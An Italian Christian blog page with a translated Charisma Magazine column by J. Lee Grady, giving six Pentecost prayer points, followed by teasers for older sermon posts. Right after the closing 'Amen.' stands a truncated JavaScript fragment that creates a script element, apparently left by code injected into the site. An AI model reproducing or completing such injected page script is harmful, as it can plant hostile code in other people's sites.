SIGNORE, MANDA IL VENTO DI UNA NUOVA PENTECOSTE!

Mercoledì 16 Mag, 2012 – dalla rubrica “Fire In My Bones” di  J. Lee Grady –  CHARISMA MAGAZINE.

Dodici anni fa un uomo d’affari sudafricano, Graham Power, sentì Dio spingerlo ad organizzare un incontro di preghiera nella città di Cape Town. Circa 45 mila cristiani hanno risposto alla chiamata accalcandosi in uno stadio di rugby nel marzo 2001, per intercedere per la loro nazione. Quello fu l’inizio della Giornata Mondiale di Preghiera, un evento che probabilmente coinvolgerà milioni di cristiani in 220 nazioni, la Domenica di Pentecoste, il 27 maggio.

Questo anno, gli organizzatori stanno incoraggiando le persone a estendere le loro preghiere a 10 giorni prima dell’evento, partendo dal 17 maggio. Hanno anche sollecitato i pastori ad alimentare la preghiera con sermoni sulla necessità della potenza dello Spirito Santo.

“Un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza nelle congregazioni morte. ”

E’ ovvio che lo Spirito Santo è l’orchestratore di questo movimento popolare, e spero che voi aderiate, sia partecipando ai culti locali durante i prossimi 10 giorni o focalizzando le vostre personali preghiere, sulla necessità di una nuova Pentecoste. Credo che siamo sull’orlo di una nuova stagione di risveglio spirituale, e la concentrazione della preghiera in questo mese sia la chiave per sbloccarlo.

Durante questi prossimi 10 giorni mediterò sui primi capitoli del libro degli Atti e pregherò  per un’effusione di Spirito Santo su questa nazione. Se volete unirvi a me, potete utilizzare i seguenti punti di preghiera come guida:

1. Signore, manda il vento del sincero ravvedimento.
L’effusione originale dello Spirito nel giorno di  Pentecoste, ha scatenato un’ondata di ravvedimento che ha portato 3.000 conversioni. Questo livello di convinzione, non è mai il risultato di sermoni eloquenti, messo eventi pianificati o programmi umani. Solo lo Spirito Santo può fare questo. Il miracolo più grande sulla terra si verifica quando si spezza il cuore del peccatore davanti a Dio ed egli o lei nasce di nuovo.
Signore, suscita una marea di conversioni… E come peccatori pentiti, lascia che cristiani sviati, credenti delusi e stanchi ritornino a Te.

2. Signore, manda il vento di rinnovamento spirituale.
Molte chiese sono deboli e impotenti, e alcune stanno morendo. Molte denominazioni sono paralizzate dallo spirito di religiosità. Molti pastori sono impauriti e scoraggiati. Ma un soffio dello Spirito Santo può portare la vita alle ossa secche! Signore, manda il vento fresco della tua presenza in congregazioni senza vita. E con il tuo vento, fa che si posi una fiamma sulla testa di ogni cristiano, particolarmente su quei riluttanti “Gedeoni”, e timidi “Timoteo” che sanno di essere chiamati, ma hanno bisogno dello Spirito che ispiri loro fiducia.

3. Signore, manda il vento di un risveglio dei giovani. Quando il vento della Pentecoste soffiò la prima volta, Pietro predicò sul profeta Gioele, dicendo: “‘Negli ultimi giorni,’ Dio dice: ‘i vostri figli e le vostre figlie profetizzeranno, e i vostri giovani avranno delle visioni'” (Atti 2:17). Questa è una promessa ancora nostra,  e che  ancora dobbiamo rivendicare. Una percentuale enorme di giovani  sono orfani, tossicodipendenti, maltrattati, sessualmente confusi o in qualche modo a rischio. Signore, fa ‘sorgere e rafforzare ministeri per raggiungere le nostre scuole e le università. Dai agli studenti il coraggio di alzarsi per Cristo e parlare per lui. Manda un altro “Jesus Movement” in questa generazione.

4. Signore, manda il vento delle manifestazioni soprannaturali. La più pietosa eresia mai partorita è l’idea che Dio ha smesso di fare miracoli dopo che è stata scritta la Bibbia. Perdonaci, Signore, per come ti limitiamo! Abbiamo bisogno della potenza della Pentecoste oggi più che mai. Quando la prima Pentecoste avvenne, le persone normali sono stati “rivestiti di potenza dall’alto” (Luca 24:49), e cominciarono a guarire gli infermi, risuscitate i morti e scacciare i demoni. Perdonaci, Signore, per essere così compiaciuti e sofisticati, al punto  abbiamo staccato la spina della tua potenza. (E perdonaci, anche per l’uso improprio, commerciando e sfruttando i doni dello Spirito Santo per un guadagno personale.) Manda un’ondata di miracoli nella chiesa. Fai che  gli stessi miracoli che si verificano in Asia, Africa e America Latina avvengano anche nella nostra nazione.

5. Signore, manda il vento di una coraggiosa evangelizzazione . Quando i primi discepoli sono stati toccati dallo Spirito Santo a Pentecoste, hanno dichiarato “le grandi cose di Dio” (Atti 2:11) ad ogni gruppo razziale ed etnico, che era in quel giorno in Gerusalemme. Abbiamo bisogno di questo coraggio anche ai nostri giorni. Molte delle nostre comunità non hanno nessun testimone del vangelo e molti cristiani non condividono la loro fede con nessuno. La vera unzione dello Spirito Santo sfocia sempre nell’evangelizzazione. Signore, alza il nostro volume! Suscita operai per toccare ogni settore della società. Manda immigrati in questa nazione che possano raggiungere i propri gruppi etnici. Che il Vangelo sia predicato in tutte le lingue parlate all’interno dei nostri confini.

6. Signore, manda il vento di un intervento divino. La nostra nazione è in una crisi disperata. Le famiglie si stanno disintegrando, la moralità si sta erodendo, la perversione è celebrata, e la nostra cultura sta diventando ostile alla fede biblica. A meno che il Signore non risponda con il suo santo fuoco dal cielo,  soccomberemo. Signore, liberaci dal male! Estendi la tua misericordia e manda un nuovo Grande Risveglio. Amen.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Manda la tua luce e la tua verità

di  Wilhelm Busch   –   Manda la tua luce e la tua verità; mi guidino esse e mi conducano al tuo santo monte e al luogo della tua dimora. (Salmo 43:3)  –   Se leggete l’intero salmo vi renderete conto che il salmista dice continuamente: “Non c’è la faccio più! Non vedo alcuna via d’uscita!” E questo 3000 anni fa. Quanto spesso sento proprio questa frase: “Non c’è la faccio più! …
Leggi Tutto

Terry Peretti - Gli ultimi tempi

Domenica 11 Novembre 2012 …
Leggi Tutto

CHI, E COSA E' DIO

di BILLY GRAHAM  –  Nella Bibbia Dio si rivela in mille maniere e se noi la leggiamo con eguale attenzione e regolarità del nostro giornale quotidiano, saremo informati di Dio  come  del  nostro giocatore di calcio favorito! Come un diamante ha molteplici facce, così gli aspetti della rivelazione di Dio circa Se stesso, sono innumerevoli e riempirebbero degli interi volumi. Ne illustrerò quattro che sembrano i più significativi …
Leggi Tutto

Una promessa per oggi: C'è una corona che aspetta coloro che amano Mio Figlio.

Per il resto, mi è riservata la corona di giustizia che il Signore, il giusto giudice, mi assegnerà in quel giorno, e non solo a me, ma anche a tutti quelli che hanno amato la sua apparizione. (2 Timoteo 4:8) Quando l’apostolo Paolo scrive questa lettera a Timoteo, che era spiritualmente suo figlio, è ormai prossimo alla fine della sua vita. Egli proclama con forza che c’è una …
Leggi Tutto

QUANDO C'E' PASSIONE PER LE ANIME

Testimonianza di George Verwer  –  George Verwer  frequentava ancora il college, quando fondò il ministero che diventerà poi Operazione Mobilitazione. George Verwer si convertì mentre era ancora studente. Vicino al liceo che  egli frequentava, nel New Jersey, abitava una donna di preghiera. Questa donna pregava continuamente per gli studenti di questa scuola, chiedendo a Dio di salvarli e fare di loro dei missionari. Pregò perché anche George fosse …
Leggi Tutto

DAI SERMONI DI ROBERTO BRACCO

SCEGLIETE OGGI CHI VOLETE SERVIRE  (Giosuè 24) …
Leggi Tutto

IO SO CHE IL MIO REDENTORE VIVE

di Agostino Masdea   –   Ma io so che il mio Redentore, vive e che alla fine si leverà sulla terra. Dopo che questa mia pelle sarà distrutta, nella mia carne vedrò Dio. Lo vedrò io stesso; i miei occhi lo contempleranno, e non un altro. Il mio cuore si strugge dentro di me. (Giobbe 19:25-27) – Giobbe, un uomo provato, in estrema difficoltà, prigioniero della sofferenza. a. – Il libro di Giobbe …
Leggi Tutto

GEORGE MULLER: Salmo 23

Sermone predicato da GEORGE MULLER nella Bethesda Chapel, in Great George Street, Bristol, domenica sera 20 giugno 1897. «Il SIGNORE è il mio pastore: nulla mi manca. Egli mi fa riposare in verdeggianti pascoli, mi guida lungo le acque calme. Egli mi ristora l’anima, mi conduce per sentieri di giustizia, per amore del suo nome. Quand’anche camminassi nella valle dell’ombra della morte, io non temerei alcun male, perché …
Leggi Tutto

Dai nostri Culti